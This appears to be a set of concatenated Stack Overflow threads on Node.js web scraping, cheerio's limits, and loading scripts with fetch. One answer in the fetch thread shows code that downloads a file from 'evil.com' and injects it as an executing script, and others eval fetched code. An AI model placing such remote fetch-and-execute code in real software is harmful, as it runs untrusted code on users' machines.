I'm downloading a webpage using the request module, which is very straightforward.
My problem is that the page I'm trying to download has some async scripts (they have the async attribute) and they're not downloaded with the HTML document returned from the HTTP request.
My question is how I can make an HTTP request, with or without (preferably with) the request module, and have the WHOLE page downloaded, without pieces being left out as in the edge case described above.
Sounds like you are trying to do web scraping using JavaScript.
Using request is a very fundamental approach which may be too low-level and time-consuming for your needs. The topic is pretty broad, but you should look into more purpose-built modules such as cheerio, x-ray and nightmare.
x-ray will let you select elements directly from the page in a jQuery-like way instead of parsing the whole body.
nightmare provides a modern headless browser which makes it possible for you to enter input as though using the browser manually. With this you should be able to better handle the AJAX-type requests which are causing you problems.
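For example, a minimal nightmare sketch (the URL and selector here are placeholders, not from your page) that waits for the async scripts to run before grabbing the rendered HTML might look like this:

const Nightmare = require('nightmare');
const nightmare = Nightmare({ show: false });

nightmare
    .goto('http://example.com')        // placeholder URL
    .wait('#some-element')             // placeholder selector rendered by the async scripts
    .evaluate(() => document.documentElement.outerHTML)
    .end()
    .then(html => console.log(html))
    .catch(err => console.error(err));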
HTH and good luck!
Using only request you could try the following approach to pull the async scripts.
Note: I have tested this with a very basic setup and there is work to be done to make it robust. However, it worked for me:
Test setup
To set up the test I created an HTML file which includes a script in the body like this: <script src="abc.js" async></script>
Then I created a temporary server to serve it (httpster).
Scraper
"use strict";
const request = require('request');
const options1 = { url: 'http://localhost:3333/' }
// hard coded script name for test purposes
const options2 = { url: 'http://localhost:3333/abc.js' }
let htmlData // store html page here
request.get(options1)
.on('response', resp => resp.on('data', d => htmlData += d))
.on('end', () => {
let scripts; // store scripts here
// htmlData contains webpage
// Use xml parser to find all script tags with async tags
// and their base urls
// NOT DONE FOR THIS EXAMPLE
request.get(options2)
.on('response', resp => resp.on('data', d => scripts += d))
.on('end', () => {
let allData = htmlData.toString() + scripts.toString();
console.log(allData);
})
.on('error', err => console.log(err))
})
.on('error', err => console.log(err))
This basic example works. You will still need to find all the script tags on the page and extract their URLs, which I have not done here (see the sketch below).
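As a rough sketch of that missing step, cheerio (not used in the example above) could parse htmlData and collect the src of every async script; the selector, variable names and base URL are assumptions for this test setup:

const cheerio = require('cheerio');

// htmlData is the page html accumulated above
const $ = cheerio.load(htmlData);

// collect the src attribute of every <script async src="..."> tag
const scriptUrls = $('script[async][src]')
    .map((i, el) => $(el).attr('src'))
    .get();

// resolve relative paths against the page url before requesting them
const base = 'http://localhost:3333/';
const absoluteUrls = scriptUrls.map(src => new URL(src, base).href);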
I'm new to Web Development (including JavaScript and HTML) and have a few issues within my personal project that seem to have no clear fixes.
Overview
My project takes input from a user on the website and feeds it to my back end to output a list of word-completion suggestions.
For example, given the input "bass", the program would suggest "bassist", "bassa", "bassalia", "bassalian", "bassalan", etc. as possible completions for the pattern "bass" (these are words extracted from an English dictionary text file).
The backend - running on Node.js
trie.js file:
/* code for the trie not fully shown */
var Deque = require("collections/deque"); // to be used somewhere
function add_word_to_trie(word) { ... }
function get_words_matching_pattern(pattern, number_to_get = DEFAULT_FETCH) { ... }
// read in words from English dictionary
var file = require('fs');
const DICTIONARY = 'somefile.txt';
function preprocess() {
    file.readFileSync(DICTIONARY, 'utf-8')
        .split('\n')
        .forEach( (item) => {
            add_word_to_trie(item.replace(/\r?\n|\r/g, ""));
        });
}
preprocess();
module.exports = get_words_matching_pattern;
The frontend
An HTML file that renders the visuals for the website, gets input from the user, and passes it on to the backend script to get possible suggestions. It looks something like this:
index.html script:
<!DOCTYPE HTML>
<html>
<!-- code for formatting website and headers not shown -->
<body>
    <script src="./trie.js">
        function get_predicted_text() {
            const autofill_options = get_words_matching_pattern(input.value);
            /* add the first suggestion we get from the autofill options to the user's input
               arbitrary, because I couldn't get this to actually work. Actual version of
               autofill would be more sophisticated. */
            document.querySelector("input").value += autofill_options[0];
        }
    </script>
    <input placeholder="Enter text..." oninput="get_predicted_text()">
    <!-- I get a runtime error here saying that get_predicted_text is not defined -->
</body>
</html>
Errors I get
Firstly, I get the obvious error of require() being undefined on the client side. This I fixed using browserify.
Secondly, there is the issue of 'fs' not existing on the client side, since it is a Node.js module. I have tried running the trie.js file with node and adding some server-side code:
function respond_to_user_input() {
    fs.readFile('./index.html', null, (err, html) => {
        if (err) throw err;
        http.createServer( (request, response) => {
            response.write(html);
            response.end();
        }).listen(PORT);
    });
}

respond_to_user_input();
With this, I'm not exactly sure how to edit document elements, such as changing input.value in index.html, or calling the oninput event listener within the input field. Also, my CSS stylesheet is not applied if I serve the HTML file via the node trie.js command in the terminal.
This leaves me with the question: is it even possible to run index.html directly (through Google Chrome) and have it use Node.js modules when it calls the trie.js script? And if I use the server-side code I described above with the HTTP module, how can I fix the issues of loading my external CSS stylesheet (which my HTML file references via an href) and accessing document.querySelector("input") to edit my input field?
I am writing an application in node.js that will navigate to a website, click a button on the website, and then extract certain pieces of data from the website. All is going well except for the button-clicking aspect. I cannot seem to simulate a button click. I'm extremely new at this, so I'd appreciate any suggestions y'all have! Sadly I've scoured the internet looking for a solution to this issue and have been unable to find one.
I have used .click() and .bind('click', ...) in a .js file that uses 'request' and 'cheerio'.
I have also tried using page.click() and page.evaluate() in a different .js file that uses 'chrome-launcher', 'chrome-remote-interface', and 'puppeteer'.
Here is my code for the 'request' and 'cheerio' file:
const request = require('request');
const cheerio = require('cheerio');

let p1 = {}, p2 = {}, p3 = {}, p4 = {}, p5 = {};
p1.name = 'TheJackal666';
p2.name = 'Naether Raviel';
p3.name = 'qman37';
p4.name = 'ranger51';
p5.name = 'fernanda12x';
const team = {1: p1, 2: p2, 3: p3, 4: p4, 5: p5};

for (var x in team) {
    let url = 'https://na.op.gg/summoner/userName=' + team[x].name;
    request(url, (error, response, html) => {
        if (!error && response.statusCode == 200) {
            const $ = cheerio.load(html);
            $('.SummonerRefreshButton.Button.SemiRound.Blue').click();
            //FIXME: MAKE A FUNCTION THAT SUCCESSFULLY "CLICKS" UPDATE BUTTON
            team[x].overallWR = $('.winratio');
            team[x].overallWR = team[x].overallWR.text().match(/\d/g);
            team[x].overallWR = team[x].overallWR.join("");
            console.log(team[x].overallWR);
        }
    });
}
I expect to successfully click the update button on any of the pages (there is a section on the page that says when it was last updated) without getting an error. As it is, I either get an error that:
"$(...).click is not a function"
or (if I incorporate that line into an outer function) I get no error, but no result.
See the documentation:
Cheerio is not a web browser
Cheerio parses markup and provides an API for traversing/manipulating the resulting data structure. It does not interpret the result as a web browser does. Specifically, it does not produce a visual rendering, apply CSS, load external resources, or execute JavaScript. If your use case requires any of this functionality, you should consider projects like PhantomJS or JSDom.
Cheerio is an HTML parser.
Cheerio can be used to select and manipulate DOM elements, but it is not a full browser.
Cheerio only has access to the original source DOM, which means that if the DOM of a webpage is manipulated by JavaScript, Cheerio will not notice that change.
Cheerio cannot be used to interact with DOM elements (as jQuery does), because it does not execute within a browser window.
As of this moment, if you need to manipulate or select against JS-rendered HTML, your best option is puppeteer (a sketch follows below). This is likely to change, though.
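As a rough sketch of the puppeteer route (the URL and button selector are taken from the question's code and may have changed; treat them as assumptions):

const puppeteer = require('puppeteer');

(async () => {
    const browser = await puppeteer.launch();
    const page = await browser.newPage();
    await page.goto('https://na.op.gg/summoner/userName=TheJackal666');
    // Click the update/refresh button in a real (headless) browser context
    await page.click('.SummonerRefreshButton.Button.SemiRound.Blue');
    // Wait for the win ratio element to be present before reading it
    await page.waitForSelector('.winratio');
    const winRatio = await page.$eval('.winratio', el => el.textContent);
    console.log(winRatio);
    await browser.close();
})();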
HTH
Lower intermediate JS/JQ person here.
I'm trying to escape callback hell by using JS fetch. This is billed as "the replacement for AJAX" and seems to be pretty powerful. I can see how you can get HTML and JSON objects with it... but is it capable of running another JS script from the one you're in? Maybe there's another new function in ES6 to do:
$.getScript( 'xxx.js' );
i.e.
$.ajax({ url : 'xxx.js', dataType : "script", });
...?
Later, in response to Joseph The Dreamer:
Tried this:
const createdScript = $(document.createElement('script')).attr('src', 'generic.js');
fetch( createdScript )...
... it didn't run the script "generic.js". Did you mean something else?
The Fetch API is supposed to provide a promise-based API to fetch remote data. Loading a random remote script is not AJAX - even if jQuery.ajax is capable of that - and it won't be handled by the Fetch API.
A script can be appended dynamically and wrapped with a promise:
const scriptPromise = new Promise((resolve, reject) => {
    const script = document.createElement('script');
    script.onload = resolve;
    script.onerror = reject;
    script.async = true;
    script.src = 'foo.js';
    document.body.appendChild(script);
});
scriptPromise.then(() => { ... });
SystemJS provides a promise-based API for script loading and can be used as well:
System.config({
    meta: {
        '*': { format: 'global' }
    }
});

System.import('foo.js').then(() => { ... });
There are a few things to mention here.
Yes, it is possible to execute a JavaScript file just loaded from the server. You can fetch the file as text and use eval(...), although this is not recommended because of untraceable side effects and lack of security!
Another option would be:
1. Load the javascript file
2. Create a script tag with the file contents (or url, since the browser caches the file)
This works, but it may not free you from callback hell per se (a sketch follows below).
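A minimal sketch of that second option, assuming a hypothetical file name and that the fetched code is trusted first-party code:

// Fetch the script source as text, then inject it via a <script> tag.
// 'my-module.js' is a hypothetical path used only for illustration.
fetch('my-module.js')
    .then(response => response.text())
    .then(source => {
        const script = document.createElement('script');
        script.textContent = source;   // inline the fetched contents
        document.head.appendChild(script);
    })
    .catch(err => console.error(err));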
If what you want is to load other JavaScript files dynamically, you can use, for example, RequireJS: you can define modules and load them dynamically. Take a look at http://requirejs.org/
If you really want to get out of the callback hell, what you need to do is
Define functions (you can have them in the same file or load from another file using requirejs in the client, or webpack if you can afford a compilation before deployment)
Use promises or streams if needed (see Rxjs https://github.com/Reactive-Extensions/RxJS)
Remember that promise.then returns a promise
someAsyncThing()
    .then(doSomethingAndResolveAnotherAsyncThing)
    .then(doSomethingAsyncAgain)
Remember that promises can be composed
Promise.all([somePromise, anotherPromise, fetchFromServer])
    .then(doSomethingWhenAllOfThoseAreResolved)
Yes, you can:
<script>
fetch('https://evil.com/1.txt').then(function(response) {
    if (!response.ok) {
        return false;
    }
    return response.blob();
}).then(function(myBlob) {
    var objectURL = URL.createObjectURL(myBlob);
    var sc = document.createElement("script");
    sc.setAttribute("src", objectURL);
    sc.setAttribute("type", "text/javascript");
    document.head.appendChild(sc);
})
</script>
Don't listen to the selected "right" answer.
The following fetch() API approach works perfectly well for me, as proposed in @cnexans' answer (using .text() and then eval()). I noticed increased performance compared to the method of adding the <script> tag.
Run the code snippet to see the fetch() API loading the script asynchronously (as it is a Promise):
// Loading moment.min.js as sample script
// only use eval() for sites you trust
fetch('https://momentjs.com/downloads/moment.min.js')
    .then(response => response.text())
    .then(txt => eval(txt))
    .then(() => {
        document.getElementById('status').innerHTML = 'moment.min.js loaded';
        // now you can use the script
        document.getElementById('today').innerHTML = moment().format('dddd');
        document.getElementById('today').style.color = 'green';
    })
#today {
color: orange;
}
<div id='status'>loading 'moment.min.js' ...</div>
<br>
<div id='today'>please wait ...</div>
The Fetch API provides an interface for fetching resources (including across the network). It will seem familiar to anyone who has used XMLHttpRequest, but the new API provides a more powerful and flexible feature set. https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API
That's what it's supposed to do, but unfortunately it doesn't evaluate the script.
That's why I released this tiny Fetch data loader on GitHub.
It loads the fetched content into a target container and runs its scripts (without using the evil eval() function).
A demo is available here: https://www.ajax-fetch-data-loader.miglisoft.com
Here's a code sample:
<script>
document.addEventListener('DOMContentLoaded', function(event) {
    fetch('ajax-content.php')
        .then(function (response) {
            return response.text()
        })
        .then(function (html) {
            console.info('content has been fetched from data.html');
            loadData(html, '#ajax-target').then(function (html) {
                console.info('I\'m a callback');
            })
        }).catch((error) => {
            console.log(error);
        });
});
</script>
I know that this could be a very stupid question, but, since I'm totally new to Javascript, I'm not sure about how to do this. I want to write a script and run it through node on my laptop, and, in this script, I want to interact with a web page in order to use functions like document.getElementById and stuff like that.
In Python one could do this by using something like Beautiful Soup or requests, but how do you do this in JavaScript?
I have implemented a crawler using cheerio and request-promise as follows:
https://www.npmjs.com/package/cheerio
let request = require('request-promise');
let cheerio = require('cheerio');

// Transform every response body into a cheerio object before the promise resolves
request = request.defaults({
    transform: function (body) {
        return cheerio.load(body);
    }
});

// ... omitted

request({uri: 'http://example.org'})
    .then($ => {
        // $ works like jQuery against the fetched markup
        const element = $('.element-with-class');
    });
I've seen some answers to this that refer the asker to other libraries (like PhantomJS), but I'm wondering here if it is at all possible to do this in just Node.js?
Consider my code below. It requests a webpage using request, then uses cheerio to explore the DOM and scrape the page for data. It works flawlessly, and if everything had gone as planned, I believe it would have output a file as I imagined it in my head.
The problem is that the page I am requesting builds the table I'm looking at asynchronously, using either AJAX or JSONP; I'm not entirely sure how .jsp pages work.
So here I am, trying to find a way to "wait" for this data to load before I scrape it for my new file.
var cheerio = require('cheerio'),
    request = require('request'),
    fs = require('fs');

// Go to the page in question
request({
    method: 'GET',
    url: 'http://www1.chineseshipping.com.cn/en/indices/cbcfinew.jsp'
}, function(err, response, body) {
    if (err) return console.error(err);

    // Tell Cheerio to load the HTML
    var $ = cheerio.load(body);

    // Create an empty object to write to the file later
    var toSort = {};

    // Iterate over the DOM and fill the toSort object
    $('#emb table td.list_right').each(function() {
        var row = $(this).parent();
        toSort[$(this).text()] = {
            [$("#lastdate").text()]: $(row).find(".idx1").html(),
            [$("#currdate").text()]: $(row).find(".idx2").html()
        };
    });

    // Write/overwrite a new file
    var stream = fs.createWriteStream("/tmp/shipping.txt");
    var toWrite = "";

    stream.once('open', function(fd) {
        toWrite += "{\r\n";
        for (var i in toSort) {
            toWrite += "\t" + i + ": { \r\n";
            for (var j in toSort[i]) {
                toWrite += "\t\t" + j + ":" + toSort[i][j] + ",\r\n";
            }
            toWrite += "\t" + "}, \r\n";
        }
        toWrite += "}";
        stream.write(toWrite);
        stream.end();
    });
});
The expected result is a text file with information formatted like a JSON object.
It should contain multiple entries that look something like this:
"QINHUANGDAO - GUANGZHOU (50,000-60,000DWT)": {
"2016-09-29": 26.7,
"2016-09-30": 26.8,
},
But since the name is the only thing that doesn't load asynchronously (the dates and values do), I get a messed-up object.
Actually, I tried just setting a setTimeout in various places in the code. The script will only be touched by developers who can afford to re-run it if it fails a few times. So, while not ideal, even a setTimeout (up to maybe 5 seconds) would be good enough.
It turns out the setTimeouts don't work. I suspect that once I request the page, I'm stuck with a snapshot of the page "as is" when I receive it, and I'm not in fact looking at a live page I can wait on to load its dynamic content.
I've considered investigating how to intercept the requests as they come in, but I don't understand HTTP well enough to know where to start.
The setTimeout will not make any difference even if you increase it to an hour. The problem here is that you are making a request against this url:
http://www1.chineseshipping.com.cn/en/indices/cbcfinew.jsp
and their server returns the HTML, which contains the JS and CSS imports. That is all you get: the raw HTML. A browser, on the other hand, knows how to parse the HTML document and to execute the JavaScript it references, and that is exactly your problem: your program never runs the scripts referenced by the HTML. You need to find or write a scraper that is able to run JavaScript. I just found this similar issue on Stack Overflow:
Web-scraping JavaScript page with Python
The answer there suggests https://github.com/niklasb/dryscrape, and it seems that this tool is able to run JavaScript. It is written in Python, though.
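For a Node-based equivalent (not part of that answer, just a rough sketch), a headless browser such as puppeteer can render the page, wait for the table to fill in, and hand the final HTML to cheerio; the table selector is taken from the question's code:

const puppeteer = require('puppeteer');
const cheerio = require('cheerio');

(async () => {
    const browser = await puppeteer.launch();
    const page = await browser.newPage();
    await page.goto('http://www1.chineseshipping.com.cn/en/indices/cbcfinew.jsp');
    // Wait until the asynchronously built table cells exist
    await page.waitForSelector('#emb table td.list_right');
    const html = await page.content();
    await browser.close();

    // From here on, the original cheerio logic sees the fully rendered DOM
    const $ = cheerio.load(html);
    console.log($('#emb table td.list_right').length);
})();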
You are trying to scrape the original page that doesn't include the data you need.
When the page is loaded, browser evaluates JS code it includes, and this code knows where and how to get the data.
The first option is to evaluate the same code, like PhantomJS does.
The other (and you seem to be interested in it) is to investigate the page's network activity and to understand what additional requests you should perform to get the data you need.
In your case, these are:
http://index.chineseshipping.com.cn/servlet/cbfiDailyGetContrast?SpecifiedDate=&jc=jsonp1475577615267&_=1475577619626
and
http://index.chineseshipping.com.cn/servlet/allGetCurrentComposites?date=Tue%20Oct%2004%202016%2013:40:20%20GMT+0300%20(MSK)&jc=jsonp1475577615268&_=1475577620325
In both requests:
_ is a cache-busting parameter to prevent caching.
jc is the name of the JS wrapper function that should be invoked with the result (https://en.wikipedia.org/wiki/JSONP).
So, by scraping the table template at http://www1.chineseshipping.com.cn/en/indices/cbcfinew.jsp and performing the two additional requests, you will be able to combine them into the same data structure you see in the browser.
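As a rough sketch of that second approach (the URL and jc value are copied from the request above; the exact shape of the returned JSON is an assumption):

const request = require('request');

// One of the two JSONP endpoints identified above
const url = 'http://index.chineseshipping.com.cn/servlet/cbfiDailyGetContrast' +
            '?SpecifiedDate=&jc=jsonp1475577615267&_=' + Date.now();

request(url, (err, response, body) => {
    if (err) return console.error(err);
    // The body looks like jsonp1475577615267({...}); strip the wrapper to get plain JSON
    const json = body.replace(/^[^(]*\(/, '').replace(/\);?\s*$/, '');
    const data = JSON.parse(json);
    console.log(data);
});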